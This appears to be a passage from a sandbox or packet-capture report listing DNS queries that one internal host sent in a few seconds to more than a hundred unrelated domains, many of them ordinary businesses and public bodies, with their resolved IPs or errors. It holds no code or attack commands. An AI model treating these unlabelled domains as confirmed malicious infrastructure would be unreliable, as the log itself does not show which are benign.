                                                                                                                                                                              Sep 15, 2023 07:27:40.838812113 CEST8.8.8.8192.168.2.30xb493No error (0)bossinst.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.860610008 CEST8.8.8.8192.168.2.30xae34No error (0)dataform.co.uk83.223.113.46A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.876120090 CEST8.8.8.8192.168.2.30x5436Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.878766060 CEST8.8.8.8192.168.2.30x5ad0No error (0)pleszew.policja.gov.pl91.229.22.126A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.901978016 CEST8.8.8.8192.168.2.30x9621No error (0)cqdgroup.com221.132.33.88A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.970911026 CEST8.8.8.8192.168.2.30xa146No error (0)muhr-soehne.de5.189.171.125A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.983417034 CEST8.8.8.8192.168.2.30xecc8No error (0)rtcasey.com69.195.90.46A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:40.992790937 CEST8.8.8.8192.168.2.30x30aeNo error (0)aba.org.eg192.169.149.78A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.003528118 CEST8.8.8.8192.168.2.30xa3e0No error (0)amerifor.com64.18.191.61A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.014431953 CEST8.8.8.8192.168.2.30x88No error (0)insia.com82.208.6.9A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.036952972 CEST8.8.8.8192.168.2.30x18ffServer failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.040853024 CEST8.8.8.8192.168.2.30x77a1No error (0)kayoaiba.com47.91.170.222A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.049165010 CEST8.8.8.8192.168.2.30xde8dNo error (0)603888.com67.21.93.239A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.082595110 CEST8.8.8.8192.168.2.30x28c3No error (0)mackusick.de217.160.0.131A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.163693905 CEST8.8.8.8192.168.2.30x5f44No error (0)smitko.net31.15.12.103A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.177586079 CEST8.8.8.8192.168.2.30x8b1aNo error (0)impexnc.com208.91.197.46A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.200201988 CEST8.8.8.8192.168.2.30x99fcNo error (0)ftmobile.com199.34.228.78A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.211452961 CEST8.8.8.8192.168.2.30x7564No error (0)gbmfg.com151.101.2.132A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.211452961 CEST8.8.8.8192.168.2.30x7564No error (0)gbmfg.com151.101.66.132A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.211452961 CEST8.8.8.8192.168.2.30x7564No error (0)gbmfg.com151.101.130.132A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.211452961 CEST8.8.8.8192.168.2.30x7564No error (0)gbmfg.com151.101.194.132A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.214829922 CEST8.8.8.8192.168.2.30xe5f5Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.239185095 CEST8.8.8.8192.168.2.30x684dName error (3)pcoyuncu.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.252813101 CEST8.8.8.8192.168.2.30xb63cNo error (0)clinicasanluis.com.co172.67.164.178A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.252813101 CEST8.8.8.8192.168.2.30xb63cNo error (0)clinicasanluis.com.co104.21.66.220A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.262192965 CEST8.8.8.8192.168.2.30xbf15No error (0)nettle.pl195.128.140.29A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.262963057 CEST8.8.8.8192.168.2.30x78faNo error (0)holp-ai.com59.106.13.169A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.270647049 CEST8.8.8.8192.168.2.30xc3d6No error (0)biurohera.pl79.96.161.192A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.270647049 CEST8.8.8.8192.168.2.30xc3d6No error (0)biurohera.pl54.36.175.146A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.346554995 CEST8.8.8.8192.168.2.30xb5fName error (3)pcoyuncu.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.360091925 CEST8.8.8.8192.168.2.30x8a12No error (0)esmoke.net204.15.134.44A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.367866993 CEST8.8.8.8192.168.2.30xd7b4No error (0)hbfuels.com85.233.160.146A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.382664919 CEST8.8.8.8192.168.2.30xb7fcNo error (0)sinwal.com172.67.206.199A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.382664919 CEST8.8.8.8192.168.2.30xb7fcNo error (0)sinwal.com104.21.50.138A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.450354099 CEST8.8.8.8192.168.2.30x8f09Name error (3)pcoyuncu.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.474308968 CEST8.8.8.8192.168.2.30x4388No error (0)techtrans.de185.237.66.112A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.484106064 CEST8.8.8.8192.168.2.30x71e1Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.512590885 CEST8.8.8.8192.168.2.30xd215No error (0)ifesnet.com104.21.24.39A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.512590885 CEST8.8.8.8192.168.2.30xd215No error (0)ifesnet.com172.67.216.194A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.526246071 CEST8.8.8.8192.168.2.30xf63No error (0)beafin.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.551456928 CEST8.8.8.8192.168.2.30xbcbNo error (0)johnlyon.org141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.554758072 CEST8.8.8.8192.168.2.30x725dNo error (0)www.muhr-soehne.de5.189.171.125A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.568828106 CEST8.8.8.8192.168.2.30xe054Name error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.577539921 CEST8.8.8.8192.168.2.30xd7b9No error (0)workplus.hu81.0.97.108A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.674722910 CEST8.8.8.8192.168.2.30x9f76No error (0)www.diamir.de94.130.146.206A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.746596098 CEST8.8.8.8192.168.2.30x71b4Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.767654896 CEST8.8.8.8192.168.2.30xa20No error (0)bosado.com5.39.75.157A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.774138927 CEST8.8.8.8192.168.2.30xe637No error (0)mcseurope.nl46.19.218.80A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.780277014 CEST8.8.8.8192.168.2.30xa261No error (0)tcpoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.780277014 CEST8.8.8.8192.168.2.30xa261No error (0)tcpoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.871279001 CEST8.8.8.8192.168.2.30x5893No error (0)hamaker.net34.102.136.180A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:41.971851110 CEST8.8.8.8192.168.2.30x4997Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.189244032 CEST8.8.8.8192.168.2.30xbd9cNo error (0)gphpedit.org127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.228810072 CEST8.8.8.8192.168.2.30xcb91No error (0)plaske.ua5.181.161.11A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.268119097 CEST8.8.8.8192.168.2.30x5eaeNo error (0)hubbikes.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.268119097 CEST8.8.8.8192.168.2.30x5eaeNo error (0)hubbikes.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.322076082 CEST8.8.8.8192.168.2.30xceefNo error (0)shiner.com104.21.27.205A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.322076082 CEST8.8.8.8192.168.2.30xceefNo error (0)shiner.com172.67.143.148A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.322280884 CEST8.8.8.8192.168.2.30x376cNo error (0)cnti.krsn.ru217.74.161.133A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.390820026 CEST8.8.8.8192.168.2.30xd1ebNo error (0)gcss.com15.197.204.56A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.390820026 CEST8.8.8.8192.168.2.30xd1ebNo error (0)gcss.com3.33.243.145A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.398281097 CEST8.8.8.8192.168.2.30x1ef9No error (0)webavant.com148.72.176.26A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.405478001 CEST8.8.8.8192.168.2.30x4870Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.439369917 CEST8.8.8.8192.168.2.30x2070No error (0)smitko.net31.15.12.103A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.457160950 CEST8.8.8.8192.168.2.30x45b3Name error (3)eos-i.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.511617899 CEST8.8.8.8192.168.2.30x8030Name error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.533792973 CEST8.8.8.8192.168.2.30xe71aName error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.536252022 CEST8.8.8.8192.168.2.30x5993No error (0)siongann.com104.21.8.75A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.536252022 CEST8.8.8.8192.168.2.30x5993No error (0)siongann.com172.67.156.237A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.544589996 CEST8.8.8.8192.168.2.30x6731No error (0)bggs.com35.230.155.43A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.545583963 CEST8.8.8.8192.168.2.30x4c2eNo error (0)ifesnet.com104.21.24.39A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.545583963 CEST8.8.8.8192.168.2.30x4c2eNo error (0)ifesnet.com172.67.216.194A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.547497988 CEST8.8.8.8192.168.2.30x9f22No error (0)hbfuels.com85.233.160.146A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.559283018 CEST8.8.8.8192.168.2.30x5c31No error (0)mondopp.net173.231.184.124A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.559618950 CEST8.8.8.8192.168.2.30xc061Name error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.599447012 CEST8.8.8.8192.168.2.30xf0deNo error (0)zemarmot.net164.132.175.106A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.607544899 CEST8.8.8.8192.168.2.30x7386No error (0)alexpope.biz76.74.184.61A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.611939907 CEST8.8.8.8192.168.2.30x8ecfName error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.649861097 CEST8.8.8.8192.168.2.30xdcfNo error (0)workplus.hu81.0.97.108A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.663585901 CEST8.8.8.8192.168.2.30x5e49No error (0)aiolos-sa.gr172.67.168.72A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.663585901 CEST8.8.8.8192.168.2.30x5e49No error (0)aiolos-sa.gr104.21.26.121A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.674882889 CEST8.8.8.8192.168.2.30x1077Name error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.686342001 CEST8.8.8.8192.168.2.30x9d4eNo error (0)gydrozo.ru91.220.211.163A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.702991009 CEST8.8.8.8192.168.2.30x4179No error (0)ccrsi.org198.209.253.30A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.718492985 CEST8.8.8.8192.168.2.30xd9ddNo error (0)nlcv.bas.bg195.96.252.188A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.757778883 CEST8.8.8.8192.168.2.30x71b4Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.766978979 CEST8.8.8.8192.168.2.30x8434No error (0)snf.it95.174.22.233A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.776228905 CEST8.8.8.8192.168.2.30xfcccName error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.802223921 CEST8.8.8.8192.168.2.30x875No error (0)lpver.com92.204.129.113A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.807106972 CEST8.8.8.8192.168.2.30x1d31No error (0)gydrozo.ru91.220.211.163A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.842086077 CEST8.8.8.8192.168.2.30x552cNo error (0)duiops.net135.125.108.170A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.847470045 CEST8.8.8.8192.168.2.30x5b20No error (0)tozzhin.com202.94.166.30A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.857060909 CEST8.8.8.8192.168.2.30x3c64Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.910387993 CEST8.8.8.8192.168.2.30xe1beNo error (0)rast.se93.188.2.51A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.916016102 CEST8.8.8.8192.168.2.30xd7aNo error (0)kamptal.at128.204.134.138A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.926033020 CEST8.8.8.8192.168.2.30x70b6No error (0)linac.co.uk23.236.62.147A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.962661028 CEST8.8.8.8192.168.2.30xfef3No error (0)hubbikes.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.962661028 CEST8.8.8.8192.168.2.30xfef3No error (0)hubbikes.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.964745045 CEST8.8.8.8192.168.2.30xd4dfNo error (0)plaske.ua5.181.161.11A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.981115103 CEST8.8.8.8192.168.2.30x97a7No error (0)a-domani.com183.90.232.24A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.984177113 CEST8.8.8.8192.168.2.30x73c7No error (0)uster.com104.20.221.29A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.984177113 CEST8.8.8.8192.168.2.30x73c7No error (0)uster.com104.20.220.29A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.984177113 CEST8.8.8.8192.168.2.30x73c7No error (0)uster.com172.67.32.172A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.013914108 CEST8.8.8.8192.168.2.30xf74cNo error (0)vivastay.comtraff-3.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.013914108 CEST8.8.8.8192.168.2.30xf74cNo error (0)traff-3.hugedomains.comhdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.013914108 CEST8.8.8.8192.168.2.30xf74cNo error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.18.7.81A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.013914108 CEST8.8.8.8192.168.2.30xf74cNo error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.19.116.195A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.044853926 CEST8.8.8.8192.168.2.30xb435No error (0)yhsll.com38.36.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.122220039 CEST8.8.8.8192.168.2.30x7b23No error (0)duiops.net135.125.108.170A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.129436016 CEST8.8.8.8192.168.2.30x94c7No error (0)cubodown.com91.195.240.94A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.150122881 CEST8.8.8.8192.168.2.30xf1afNo error (0)stopllc.com162.241.233.114A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.160257101 CEST8.8.8.8192.168.2.30xad5No error (0)komie.com59.106.13.181A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.189938068 CEST8.8.8.8192.168.2.30xa38dNo error (0)enguita.net195.5.116.23A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.191854000 CEST8.8.8.8192.168.2.30x74baNo error (0)daytonir.com104.18.40.43A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.191854000 CEST8.8.8.8192.168.2.30x74baNo error (0)daytonir.com172.64.147.213A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.262798071 CEST8.8.8.8192.168.2.30xb470No error (0)rappich.de89.31.143.1A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.266324043 CEST8.8.8.8192.168.2.30xab15No error (0)www.clinicasanluis.com.co104.21.66.220A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.266324043 CEST8.8.8.8192.168.2.30xab15No error (0)www.clinicasanluis.com.co172.67.164.178A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.291106939 CEST8.8.8.8192.168.2.30x39a0Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.314815998 CEST8.8.8.8192.168.2.30xd9f7Server failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.349622965 CEST8.8.8.8192.168.2.30x5a43No error (0)keio-web.com219.94.128.216A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.451730967 CEST8.8.8.8192.168.2.30x84No error (0)cjcagent.com72.52.178.23A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.453468084 CEST8.8.8.8192.168.2.30x424bNo error (0)oaith.ca192.124.249.12A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.486618042 CEST8.8.8.8192.168.2.30xe830No error (0)nels.co.uk5.134.13.210A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.512561083 CEST8.8.8.8192.168.2.30xcd21No error (0)ftchat.com172.67.140.52A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.512561083 CEST8.8.8.8192.168.2.30xcd21No error (0)ftchat.com104.21.46.148A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.531546116 CEST8.8.8.8192.168.2.30x5c31No error (0)mondopp.net173.231.184.124A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.554157019 CEST8.8.8.8192.168.2.30x5c31No error (0)mondopp.net173.231.184.124A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.566345930 CEST8.8.8.8192.168.2.30x917eNo error (0)fdlymca.org192.124.249.9A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.568950891 CEST8.8.8.8192.168.2.30xb8f7No error (0)portoccd.org51.89.6.56A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.571810961 CEST8.8.8.8192.168.2.30x1f1dNo error (0)revoldia.net154.201.225.123A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.626032114 CEST8.8.8.8192.168.2.30x3ca2No error (0)ludomemo.com27.0.174.59A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.632124901 CEST8.8.8.8192.168.2.30x7226No error (0)siongann.com104.21.8.75A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.632124901 CEST8.8.8.8192.168.2.30x7226No error (0)siongann.com172.67.156.237A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.655487061 CEST8.8.8.8192.168.2.30xca78Server failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.760060072 CEST8.8.8.8192.168.2.30x6019No error (0)host.do217.79.248.38A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.789343119 CEST8.8.8.8192.168.2.30x71b4Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.850476980 CEST8.8.8.8192.168.2.30x39a0Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.869257927 CEST8.8.8.8192.168.2.30x94c7No error (0)kayoaiba.com47.91.170.222A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.876656055 CEST8.8.8.8192.168.2.30x1b34No error (0)msl-lock.com165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.876656055 CEST8.8.8.8192.168.2.30x1b34No error (0)msl-lock.com165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.936108112 CEST8.8.8.8192.168.2.30x7964No error (0)zemarmot.net164.132.175.106A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.967120886 CEST8.8.8.8192.168.2.30xcd84Server failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.986315012 CEST8.8.8.8192.168.2.30x1dddNo error (0)usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.992716074 CEST8.8.8.8192.168.2.30x948Name error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.002173901 CEST8.8.8.8192.168.2.30x948Name error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.067843914 CEST8.8.8.8192.168.2.30xc494No error (0)burstner.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.100606918 CEST8.8.8.8192.168.2.30xdc03No error (0)mjrcpas.com204.11.56.50A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.115861893 CEST8.8.8.8192.168.2.30x8cbcName error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.192854881 CEST8.8.8.8192.168.2.30x5263No error (0)noblesse.be5.134.4.115A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.209528923 CEST8.8.8.8192.168.2.30xee52No error (0)nrsi.com76.223.35.103A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.266356945 CEST8.8.8.8192.168.2.30xf1afNo error (0)stopllc.com162.241.233.114A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.313714981 CEST8.8.8.8192.168.2.30x43caName error (3)iranytu.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.418333054 CEST8.8.8.8192.168.2.30xe67Name error (3)iranytu.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.430615902 CEST8.8.8.8192.168.2.30xf5eNo error (0)koz1.net72.251.233.245A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.441067934 CEST8.8.8.8192.168.2.30xbc06No error (0)k-nikko.com13.113.204.223A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.441067934 CEST8.8.8.8192.168.2.30xbc06No error (0)k-nikko.com18.179.184.212A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.455342054 CEST8.8.8.8192.168.2.30x7289No error (0)sidepath.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.455342054 CEST8.8.8.8192.168.2.30x7289No error (0)sidepath.com34.193.204.92A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.455342054 CEST8.8.8.8192.168.2.30x7289No error (0)sidepath.com34.193.69.252A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.455342054 CEST8.8.8.8192.168.2.30x7289No error (0)sidepath.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.474369049 CEST8.8.8.8192.168.2.30xd37eServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.501568079 CEST8.8.8.8192.168.2.30xb2d8No error (0)likangds.com156.251.140.23A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.525172949 CEST8.8.8.8192.168.2.30xfbe8Name error (3)iranytu.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.531611919 CEST8.8.8.8192.168.2.30xd591Name error (3)arowines.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.556232929 CEST8.8.8.8192.168.2.30xb4b0Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.565484047 CEST8.8.8.8192.168.2.30x1f56No error (0)cyclad.pl87.98.236.253A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.636435986 CEST8.8.8.8192.168.2.30x2c72Name error (3)arowines.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.655329943 CEST8.8.8.8192.168.2.30xa89fNo error (0)scip.org.uk104.26.13.244A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.655329943 CEST8.8.8.8192.168.2.30xa89fNo error (0)scip.org.uk172.67.72.150A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.655329943 CEST8.8.8.8192.168.2.30xa89fNo error (0)scip.org.uk104.26.12.244A (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.659663916 CEST8.8.8.8192.168.2.30xf45bNo error (0)softizer.com185.163.45.187A (IP address)IN (0x0001)false
